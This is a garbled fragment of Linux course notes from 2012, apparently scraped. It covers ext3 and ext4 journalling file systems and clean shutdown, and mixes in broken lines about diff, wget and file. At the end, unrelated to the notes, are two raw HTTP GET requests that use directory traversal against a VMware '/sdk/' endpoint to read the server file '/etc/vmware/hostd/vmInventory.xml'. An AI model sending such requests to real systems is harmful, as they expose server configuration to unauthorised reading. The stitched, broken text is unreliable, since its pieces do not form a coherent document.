Updated: 2012-11-28 10:15 EST
Your Final Exam schedule is posted in the ICT office and on the Course Home Page.
diff
commandwget 'http://idallen.com/'
file
- tell what kind of thing it is
-s
option is useful for special files such as partitionsYour system install created “journalling” file systems on your virtual disk, using the “-t ext3” option to mkfs. Another way to request this kind of file system is to use the “-j” (Journalling) option to the original “mke2fs” command. This type of Linux journalling file system is usually called “ext3” or “ext4”, and some distributions have a small shell script named “mke3fs” that simply calls mke2fs with the “-t ext3” or “-j” option.
Journalling file systems are more resistant to corruption due to sudden power loss, allowing the system to come back up more quickly by avoiding a long file system check at boot time. This does NOT give you permission to power off a running Linux system! Always shut down cleanly. The correct command-line for an immediate, safe system shut down is:
# shutdown -h now
See the man page for other options.
GET /sdk/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E//etc/vmware/hostd/vmInventory.xml HTTP/1.1
GET /sdk/../../../../../..//etc/vmware/hostd/vmInventory.xml HTTP/1.1